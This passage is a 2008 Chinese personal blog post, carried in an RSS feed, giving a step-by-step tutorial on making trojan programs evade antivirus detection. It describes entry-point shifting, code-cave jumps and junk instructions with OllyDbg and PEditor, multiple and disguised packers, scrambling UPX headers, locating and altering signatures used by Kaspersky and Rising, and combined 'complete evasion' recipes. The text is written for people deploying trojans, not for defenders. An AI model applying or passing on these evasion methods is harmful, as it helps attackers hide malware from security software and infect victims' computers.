1.用到工具：PEditor <br><br>    2.特点：非常简单实用，但有时还会被卡巴查杀。 <br><br>    3.操作要点：用PEditor打开无壳木马程序，把原入口点加1即可。 <br><br>    二、变化入口地址免杀法： <br><br>    1.用到工具：OllyDbg，PEditor <br><br>    2.特点：操作也比较容易，而且免杀效果比入口点加1点要佳。  <br><br>    3.操作要点：用OD载入无壳的木马程序，把入口点的前二句移到零区域去执行，然后又跳回到入口点的下面第三句继续执行。最后用PEditor把入口点改成零区域的地址。     <br><br>    三、加花指令法免杀法： <br><br>    1.用到工具：OllyDbg，PEditor  <br><br>    2.特点：免杀通用性非常好，加了花指令后，就基本达到大量杀毒软件的免杀。  <br><br>    3.操作要点：用OD打开无壳的木马程序，找到零区域，把我们准备好的花指令填进去填好后又跳回到入口点，保存好后，再用PEditor把入口点改成零区域处填入花指令的着地址。 <br><br>    四、加壳或加伪装壳免杀法： <br><br>    1.用到工具：一些冷门壳，或加伪装壳的工具，比如木马彩衣等。 <br><br>    2.特点：操作简单化，但免杀的时间不长，可能很快被杀，也很难躲过卡巴的追杀。 <br><br>    3.操作要点：为了达到更好的免杀效果可采用多重加壳，或加了壳后在加伪装壳的免杀效果更佳。 <br><br>    五、打乱壳的头文件或壳中加花免杀法：  <br><br>    1.用到工具：秘密行动 ，UPX加壳工具。 <br><br>    2.特点：操作也是傻瓜化，免杀效果也正当不错，特别对卡巴的免杀效果非常好。 <br><br>    3.操作要点：首先一定要把没加过壳的木马程序用UPX加层壳，然后用秘密行动这款工具中的SCramble功能进行把UPX壳的头文件打乱，从而达到免杀效果。 <br><br>    六、修改文件特征码免杀法： <br><br>    1.用到工具：特征码定位器，OllyDbg <br><br>    2.特点：操作较复杂，要定位修改一系列过程，而且只针对每种杀毒软件的免杀，要达到多种杀毒软件的免杀，必需修改各种杀毒软件的特征码。但免杀效果好。 <br><br>    3.操作要点：对某种杀毒软件的特征码的定位到修改一系列慢长过程。 <br><br>    第四部分：快速定位与修改瑞星内存特征码  <br><br>    一、瑞星内存特征码特点：由于技术原因，目前瑞星的内存特征码在90%以上把字符串作为病毒特征码，这样对我们的定位和修改带来了方便。 <br><br>    二定位与修改要点： <br><br>    1&gt;.首先用特征码定位器大致定位出瑞星内存特征码位置 <br><br>    2&gt;.然后用UE打开，找到这个大致位置，看看，哪些方面对应的是字符串，用0替换后再用内存查杀进行查杀。直到找到内存特征码后，只要把字符串的大小写互换就能达到内存免杀效果。 <br><br>    第五部分：木马免杀综合方案  <br><br>    修改内存特征码——&gt;1&gt;入口点加1免杀法——&gt; 1&gt;加压缩壳——&gt;1&gt;再加壳或多重加壳 <br><br>    2&gt;变化入口地址免杀法 2&gt;加成僻壳 2&gt;加壳的伪装。 <br><br>     3&gt;加花指令法免杀法 3&gt;打乱壳的头文件 <br><br>    4&gt;修改文件特征码免杀法 <br><br>    注：这个方案可以任意组合各种不同的免杀方案。并达到各种不同的免杀效果。 <br><br>    第六部分：免杀方案实例演示部分 <br><br>    1.完全免杀方案一：  <br><br>    内存特征码修改 + 加UPX壳 + 秘密行动工具打乱UPX壳的头文件。 <br><br>    2.完全免杀方案二： <br><br>    内存特征码修改 + 加压缩壳 + 加壳的伪装 ） <br><br>    3.完全免杀方案三：  <br><br>    GD内存特征码修改 + 修改各种杀毒软件的文件特征码 + 加压缩壳 <br><br>    4.完全免杀方案四： <br><br>    内存特征码修改 + 加花指令 + 加压壳 <br><br>    5.完全变态免杀方案五： <br><br>    内存特征码修改 + 加花指令 + 入口点加1 + 加压缩壳UPX + 打乱壳的头文件 <br><br>    还有其它免杀方案可根据第五部分任意组合 </span><wbr /><br> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1226786177#comment</comments>
<qz:effect>134218322</qz:effect>
<pubDate>Sat, 15 Nov 2008 21:56:17 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1226786177</guid>
</item>

</channel>
</rss>

